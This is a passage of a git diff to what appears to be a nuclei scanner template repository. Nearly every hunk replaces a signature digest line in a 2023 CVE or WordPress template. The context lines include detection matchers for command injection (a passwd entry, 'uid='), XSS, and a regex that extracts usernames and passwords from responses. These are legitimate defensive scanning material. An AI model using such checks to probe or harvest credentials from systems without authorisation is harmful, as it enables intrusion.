4b0a00483046022100864bd2c2f0d318ac9bbdd1684d9af49ba5a3d68727d968f52f67966cbbc28030022100d36dbd36d7d775f51983b1d4427e11a83b75e7b811aa37ce80a197985d1e1090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index e5835be329..64b78724c2 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Booking", "Arrival", ">")' condition: and - -# digest: 490a00463044022004c2867b063be1ff4c1864fa49ca861a4c0a36304b8aa6d3291f719d1e8782df02206b188eeb28fc29f613ea8c761580924808ae871aaf40e5941a575e756f4cc5a0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a334d7fbec2dbf648b29dcb36e3cd27fd606bba47299284508b39c103a2cd6b802203649f8ad159eb8caf7d080d394efa6c535cda4d1ddfe35412b2c1c608cec0cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 428ca19a51..ab9ac0e8e7 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and - -# digest: 4a0a00473045022001ac8afc145861be14dc7c3967899646c65023a1d446c694ab8a9ed6b80c404d022100cbe51196caca8670dffe6fcac67a23900581a3591a1ef00121c437e519384f45:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ab5d46933084a870078bb6d6453173d74e26c380baae870b714d9f5dde94456002200fd6323a1049b6876d4212e65a1e5242e8ea008371719babb12c32ea37af6270:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index d1efffb070..c98f1fa237 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and - -# digest: 4a0a00473045022100aa8286ac6cd8bb40d6bf3ccd5b3b08919b0caef4c3337a29f874c4171e767f8f022069e51279af66427a5d47e74e2de0a3894e9271c0762a5b5e2e6d26b4bfa41ea9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a7765d5429a0864f63c8ccd102a1ad7e0dfaba9d8f2d56825af9eb2ebccd00d90220709e11bd93673c5283e652b457825303d6577354bf5e8839b9e53183b1193e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index b738b91998..f9bf0345b8 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Select Service(s)", ">")' condition: and - -# digest: 4b0a00483046022100bb1d6446d2a6ac96fd8314f8bb000544e64dbfbdf42ef14b82e624a01da66691022100d4057baf99a40b1b73fbe300e22cf9d5394d2ef6e6e70c21d14e5d1f0b1e95a7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100934a8835e0314c2343e8d27941a6e971e1780859cef86904040c2e3cab0f18e2022036d091e5a2ba31ddc795cbddcc6cbcf0dfc40a6046fba46e77da9b0b3c2bfa65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index bac1442c5d..9771f3fcf7 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -39,5 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Drinks & Extras", "Checkout", ">")' condition: and - -# digest: 490a004630440220107e5b859e5c8a9ad76723062884106f9f263f5d30af7427334173a94add1d7202204dfbc5328e622417a975de40bfa84dd0fb5390ff957fea1d50a36828c515545f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200991ce6426d5464776a04403a061c9141b32dc14f6c4f0cefa55741945e869c6022100c2b083469306da349cb51c98a32f9b7dc577da4327a12a7c6789ab3e8ffe79b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index d3abcb6de3..8f189df376 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -39,5 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Enquiry summary", ">")' condition: and - -# digest: 4a0a004730450220112cc042e0e71257b9aec9a74affc1e33716c12a598aa4782264b356c8c9b6e3022100bb0bb89b0f626a1cb51d09f3b261eac97e0d3c9f0c55ada12d4f744843f61055:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9c2a2e2f0cbbf50619bca1d0f1f9b38fb8973309a57f390b0c24ae190e1ad60022100972c1ce238feafe8d56cd8bf191e94f3c35bbb96a3a431d76dfe1ef41984b70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 8e8152dcdd..86678487da 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Passengers", "Drop-off address", ">")' condition: and - -# digest: 490a0046304402204418600e8c7f8bbe55656d96c05df2ae044caf0207787901f3c83c180faa818b02206bbd8de1508f790dc8490bbd090dc938f2cc2a56b039567c412a56c2332f004b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4f917a324742ca880d631224ed90252d1f14bca4aad625f60e18c105b1816da022100ad1d2207b2c2d446b852ddc340bd8aaad7b1bb6e200111edb0e59082f40cff58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index 64e448a0eb..722af30e82 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -47,5 +47,4 @@ http: - 'contains(body_2, "") && contains(body_2, "ditty")' - 'contains(content_type_2, "text/html")' condition: and - -# digest: 4b0a00483046022100c77161250534eff876656a797510125f7656b8acacf13b0ccf4be06afca1adcb022100b35935ed68dd3af92d96b06e06396cb239344331802557e5190fdf88daf69357:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ad56b2cc32ba9dfa9ac0932e1887722f3b3d9ffc027bac21571ac4ed0bc4a52022100b8b7f68a41beec1c85e4a36607d3542433d53be44c39654a3e4090ad66d66f5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 0371d1c726..325f1286d0 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -36,5 +36,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "New Question", ">")' condition: and - -# digest: 4b0a004830460221008e54577723554041db44aa71516c695c620acb204d1b2dca819328a4e4c920da022100c354e829e00a77143276bab040319600b92222dc0e8445447f99d0984f8a84f0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a9bfeea4add12555db4adde5436301b8da6755cc1ba0edf9f31e23d8f760e06402210083e65b47ec5dbb73e517295f540b212fded74a9c453fdfaa0cde706d9d1b71b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 23885e6e9c..caa9675ed1 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -54,5 +54,4 @@ http: part: header_2 words: - text/html - -# digest: 4b0a00483046022100f3436385b511f4d277441af70027eed6c17444a70e0afed34fa53f9aad478ad8022100eb32e5ca5d97eac5092f869d1bd52095ed4a0d3e7ccb31bbbcb1e9e5d85937b1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203817b753e89f00846cbbb55c86a0365ab6148f359873014ca75834a4c6385914022100c837472eb4700776dae9bc51a07e99eee07a24e6056d6fb0c2f034d043351059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index 30ddc9d718..52d0f9b0bf 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -39,5 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' condition: and - -# digest: 4a0a00473045022100d0b892b47c0100aa6751dff6f1c07f66f23d8c8aa62436ba72cbce04e2ff7ae1022045666d80694649e4f9fd62eb9ca3afe9840ff019cd571cf599a5b9c26050f0d7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220191d41f7547ed544b3e0376c53ec08fc8502377c2a16fe38f94096663c9b5190022100e596fd1dbb048a5367198a7bafdd35de4db94c21e31c206447a517ff8318d816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 0f1b9ccfcd..6676e15e60 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202d952949d3387fa4ec1e3a015c7941ba840d639eaccdc352c884541184696125022036171551da1041f5c3fed8209ba940852fe061d8cd91c6ca88b6053eef714882:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205d8c6651879ac7cef2d90ffb1baa0403f4cedccf61db23f95cdfff202e4a1c9f02204dcd2ddeca72606fe6770c52400e24373faa9726e864dd41f2d1e665c9fd2703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index a9a3296c9b..5e4cf3b2b2 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 404 - -# digest: 4a0a004730450221009aeb808edae3db02ff73e7e5c99e8bd03620781b36b1b0899775d5fa9daca30f022012798f946b82519e97a6f2568be680fe0c037b99633c21eb3bbf2d12730f621b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210093831e38111427284f2a0f319ff5d162b02da1ee5537359c1b939ce1dbf5ad56022024efc3bf87638d318bfb1a41f26530355988dbe6f14208b59695b0d600fd8939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 4785f2a89f..1728f57846 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -54,5 +54,4 @@ http: part: header words: - "text/html" - -# digest: 4a0a00473045022100b9abbde6d80fc122d6b7549864134fe87a12d78424c5e345f0272ea80ebcae0d02206404967893c7f62f3af67498c3a8c531a2364c4028bd533c8b1c12cfed18506c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ffa2fa8652b97ad299a6de639ded6bc29a3bda0899ff786858481660b6a520d302202f3fbfa157fc3dd93d412be68676e094476591e65330df3656e54ab73eb142af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 12a40f7559..3cfd08fd66 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -45,5 +45,4 @@ http: - "CraftCMS" condition: and case-insensitive: true - -# digest: 4a0a004730450221009c566539cd580a6d7f48c996430871dc01758876030a969193a44580a7721dd202200517cf00791484469cddcc0cebddfbe0062917f1f882c2f45a8d01a2a2099a6b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207bd29da6cfbfdf314d94a76315d08f053da5f1440f2970bf97687ba0129be59e02201a1b70f6aadd6837f979c3004b2a785a4ac541c6fb7b71b88a1d3d30e8091d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 57aa8042ad..1ddca06528 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008a9f106873dcc397ab9308d3e19033547ed45355c02963740da912f0a1e8e2f2022100c52d920f0f1768cb699340123ef44a854e558e4c6602be80a9c9ea9e231830c1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100847f75ed8221d4abbbd35d852cb8e5cc2d7dcf2cae6066a08353b03a84aabf4102210097e745ba73d748a84275d82ddb1bf96af254dcd36d6c1815b561304ad51a7721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index e2dc0b7197..902844e522 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -39,5 +39,4 @@ http: - type: regex regex: - '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"' - -# digest: 4b0a00483046022100a19853a9a38dd201f41251de27e63a9c4dae8f1d0789e9fc642c2bfbff023278022100fd66ff94fe74882ea4d6bb47753250338bc976d30fc50206f38096b23f2b09b4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022064ae35644957ee3fb82c4c18670b8df4bd22e659e60f74b8f474099c5a3fdb1502203a663b53fabf812759325666abfd96cec15c8a95db759e748e833192408485cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 7ca4e1426b..30acd56adf 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -79,5 +79,4 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and - -# digest: 490a0046304402206fa98b8876eafe1d6857bf0fd90c40bd6896f7b806ec8e1a1a7b144a656ce039022073ce57901e4044f95738ac9f46e8e1b89d56b4020fe53cc45a4e3ce79f691b50:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022014695f580de8bfcb996c8b0b2192cfbfaa6d89301fe8336543986d2fbfbcc46202207b7e0fea227b9871af77a2e0c463bcefb1e6f91ce09f1aefae427c0afbf1ceb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index a01b7811a6..93d05d7178 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100eeba17695b14f75b4447b6713c425b20fec5a3104bf96e33d89caad44167e6e1022100d4a84df72214b5cf6c3816d9bace190d1982c83fa0528ddd207aa5f1c34599cb:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201853802c4991b9028180ca515ca51f8583ce6462d64b0cef3464c9aa2a70da87022020ee45df5389f2314abae8e69654dbd30b1b7d8bb973092f382fb65d773cf86d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 32590396e3..80d9db97ab 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008369552b38f4e29e3735d4ef89b4cdad5f66c85f24718ad740ed01b138f5ff17022100e804df479f8445b712eaff940df2d4bccd7640549434a005d35baf1d889757f2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202fd5b4d0f107821325bfeba1403457c57bd805604d9406fe5bba6a741fe2c3c6022100fe519c1cf31e71bdc568e80f51fd0ee8b9046258037d58bf76cca28d33aabf79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 4466dd3e82..bd048de0b3 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200fe46ce5be32e9fe3fab8be2d733150bd8ce6f608e242ddce2194072d00f2123022100d2c9a6bc3c55c405d5ee98c0fa71bcbb6bc821617c7616e3e3cee2baa260142e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fe611c223cdb75cafd8f57bfafb6a57d59c31f6e107fcd72f6ad3fa2c054955902210083727a546d3d8641838f26aa89a4cb7fa5cde278b317dc0003d6fd09c51b6b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 8e14fa115b..1b927cca0d 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cde78196bb5d12c993b892abed15a479e479c181b52786cbe035cd5e06bdd9e70220059825589a17ee3086f26a01c6b70b7c3e15c788460a317b990d9750844702ae:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022079ba2dc6322426adcdbfa018c602f605f38be79e4856eb141f4068a1c4a82269022042c119bd39b22cd2630bbad1bca38a4b740b93f2d7bbd03ef8f76cb07e8154f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 22e3a15550..4040e0f655 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -43,5 +43,4 @@ http: - 'contains_all(header, "application/json")' - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")' condition: and - -# digest: 4a0a0047304502210084d63dcbe5d73f38f433d9e3202ca541f8e9deabe621a9a407193ab06967118c0220112e089405d265437892ff0492ab27e48003708f5b41554f23576c5374bee9b8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210081a6075cf7d862a63a52fc531010a6b3a18d1a8b74884168d010df8e955fdd7102205fa169c9c9de5227e516b8c142e9e26785908c2ec4401690dfe99ecaabccaeee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 586785e57c..a7bf16728e 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -47,5 +47,4 @@ http: part: interactsh_protocol words: - "dns" - -# digest: 4a0a0047304502207b01da1ce27efd6ac2126d3443b0ffd5a20a29348abfd417f556c7754ff6d00902210092744bab8b2f239acfc514878ba8bc1c6db7a9be4d0a0df826bed14b2c00c996:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201817551b99a58cfdcda69245300d6d82c8be9c32db3910b130e4d46377c34440022100e7f3d611a20753f852cf6aed4298797ee1db934b02b9738163efd5722d8c0aca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index b133b1f7dd..73cb536787 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -97,5 +97,4 @@ http: - "commandResult" - "uid=" condition: and - -# digest: 4a0a00473045022100d751a1bf33ef7db8d790bba0f60f2a1916237d42952e515380f1c0d7121d509d02207c70759a4434446d05b576d08be947d015e783fa3c7e5b30a176e74ac9613eb2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206dff65fd67160993fda3356550433f41887de6b592c7c742d1bce088189c45bb02205e21bcf01c14c6b1a360ba208e2a414e787ff0a6e1f8b92074d737236cb7c280:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 3ff32b9750..b661275116 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -49,5 +49,4 @@ http: part: body regex: - 'key: "([a-z_A-Z0-9]+)"' - -# digest: 4a0a0047304502207a7c91db3c4a6e945d977e7b65bfdb048f7d1a3e0b5a4986341442676b8156c3022100b82f0538df257da294e896716aa8354eeee3ac93eaa40e3151e1be88aae0892c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c55348f7d1c87593c03ae53124f8d26f58c1d5029f1ca8b00be2296324078936022100a6be507186afb080b6b1718ffd8cff528931b2c7168b36f8032187e302ceebd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 04604eb3ab..4386ed538f 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -78,5 +78,4 @@ http: part: header_2 words: - "text/plain" - -# digest: 490a00463044022006cbb0fc8375c880104282ffb0173ef9175618a4a93e7fbff4d7128c1bd7184f022026d7d761fb3fa1207c396f8f86a70d758a8f1b0171df7e676b66f66b8813cb29:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa4ce72979513f1b37f2a504fe02fe322386594d9c057d87db0460aabf3ddc84022100bcb03a9092a8e6f76b424a44f1aeb562f3b826c173e6b9468cd2a4f03ffd5e63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 98973f2817..84567b8f4d 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -42,5 +42,4 @@ http: - status_code == 500 - contains(body, "Courses") condition: and - -# digest: 4b0a00483046022100a7a49fb8440a138893a9774461cb9fda53c9282f55d817555a220d77cbc93d4b022100807679ae2603b7b9074b79f7876c076134fe8c8f927425a85f090719ee5a300f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220134684323e1092c19b32c5ff618bfae9353af4fc4962bfb55556f8bb62f8808a022100efda53e843b12f5821c63cd1e9ba7cb35b044ddf61a2f620861472aff5d90a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 618afa7a50..e309f1e181 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -42,5 +42,4 @@ http: - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - 'contains(header, "application/json")' condition: and - -# digest: 4b0a00483046022100eaa19a6b5d59d91f49f6468238dfb89a050440fc3a978205eaef1dec9a8702f8022100a39c96ad08a80adeeb858ee25c2a3f8e0ca66b60578d29fe7b041834b528520a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207968c58669bd8cbd014f4b3e2597d4a6c9f8e1b7af86663af4440c4b1dc982d902205dc95d2c8ceb9327d5620d3b6dea5ced79197b48329c5fc48b8776a5cbb8f93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index 9c51d32a2b..9f8d5b2388 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -40,5 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "alert(document.domain)", "microweber")' condition: and - -# digest: 490a004630440220268b29c114bad519b3e286d16efe6ef9f10dec5e5a042831e088c3223bc12a2802202616b4fbd9106409aada821277140bc7901a788613ea9000c82d0dd0e05bfb52:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022035f55accf6154b0175109db8d0787fc5fa089af1501acd62e7ca3811850dc046022014d102e46ddbb7d1122af1315a49785c24e1272b7b57cf7e550f94a76c4c2b0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 60e296337c..a29bd44a94 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -88,5 +88,4 @@ http: regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true - -# digest: 4b0a00483046022100fa148f4c045adfa4ef5558e33432b26ea2b3201dfb47f6e00c51b5e6dd48f4d3022100b28ecc048c3413ed412450b12661eb4ecfa6a6d017141f659bf1df73aeede0f3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210090c1da277a9c28e188673d91cb48090dfc835b7463105c5590ac280cb847b83002210090f415874ac0874e2560677e7bf2ed22002da976ab8c9c12476f1dc4ff5b92f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/sugarcrm-install.yaml b/http/misconfiguration/installer/sugarcrm-install.yaml index dbd347e0de..b05c24bf72 100644 --- a/http/misconfiguration/installer/sugarcrm-install.yaml +++ b/http/misconfiguration/installer/sugarcrm-install.yaml @@ -24,3 +24,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022064bff8ba3504b72547847adb4220ae158f7b703cb70b1ab19ab0a1961f96777f022100efb7c82c9c483414704c31d36dab093b862253721ff90762a94b561ec5eb94a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 9b71b02b39..dcca379812 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f3efc21ea695725f961317c9d53002869458f326d1711eaf08c8943c6f601958022100a2b98df78365ee9c1304cdf9251aaf8e30438012da34e9e59978a39abd462d2b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200dd8b863c3f48fdb039af1d2b7f0f1bade064af55de80a41471fb37e446ee643022100f4b7e63748f6ef79ce319211cfd5cccd1a05232f36e18170d549d173d22507b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 565c576cba..628270478b 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205bde16a6bd3ff49eeed2d5d475fe54f7f4c64e4fe8a37b8fdf402ea002c76a01022041f20d5f9475f23ea18cc48e8046aa157cc2982d1fc851929ec1a60646c3d191:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210087f47b97d8457a43de409df12dbd79be15d8749babb505711b712f59cb2a9c7702201d92be2d35c344834e699ffef3599a3213608e4d22848a8ad25b2a52cfecf5d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 315fa9eba4..14a9058e89 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203d18edc1144e023fe603286f8250fc523db42e3a4fde2a78306f8ac38394ffda022100915f74bb0e6d5ba650cc7281d2eef03dac41bf6e96eb327aebb22915b931a4ce:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d4958b2c8f9f26ce8bb4875dee564920e6878036f1366bcd1fce1fa0e28712fb022100c3b1ca3e0cece1e2e0d45d06bd6c63b3ef03292cb9855ee9d2ae18160a1f3448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 2355e78016..a1fd695017 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206066900474bbb8fa4e998b239b3b2c76ff3a8e6f2f5bb33046e4699713214d3c022100ac1430ccb88e6dbf67b494efa14c10f706ee8dcee8b7a2ad691b2346ca6332ea:922c64590222798bb761d5b6d8e72950 +# digest: 